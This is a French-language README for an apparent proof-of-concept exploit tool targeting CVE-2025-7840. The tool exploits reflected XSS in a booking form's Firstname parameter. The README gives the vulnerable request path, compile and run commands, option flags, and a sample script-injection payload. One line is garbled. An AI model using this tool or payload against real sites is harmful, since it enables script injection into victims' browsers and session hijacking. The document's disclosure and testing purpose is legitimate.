
Exploit de preuve de concept pour CVE‑2025‑7840 qui injecte des charges utiles malveillantes dans le paramètre Firstname d'un formulaire de réservation pour déclencher une XSS
Auteur : Byte Reaper (@ByteReaper0)
Exploit de preuve de concept pour CVE-2025-7840, ciblant un point de terminaison d'application web vulnérable qui ne nettoie pas les entrées utilisateur sur le paramètre Firstname d'un formulaire de réservation. En forgeant une requête GET vers :
/index.php?page=reserve&Firstname=<payload>&Lastname=test
un attaquant peut injecter et exécuter du JavaScript arbitraire dans le navigateur de la victime lorsque la réponse est rendue.
-b-c-v)libcurlargparse pour CCompilez l'exploit :
gcc -o exploit exploit.c argparse.c -lcurl
sudo ./exploit -u <TARGET_URL> [options]
| Drapeau | Description |
|---|---|
-u URL | URL de base cible (par ex. http://victim.local) |
-b PAYLOAD | Charge utile XSS personnalisée à injecter |
-c FICHIER | Fichier de cookies à utiliser pour la gestion des sessions |
-v | Mode verbeux (afficher les détails des requêtes/réponses) |
Exécuter les charges utiles par défaut contre une cible :
sudo ./exploit -u http://victim.local
Utiliser une charge utile personnalisée :
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
Inclure les cookies de session et la sortie détaillée :
sudo ./exploit -u http://victim.local -c cookies.txt -v
Ce code est fourni à des fins éducatives et de test uniquement. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester est illégale et contraire à l'éthique.
MIT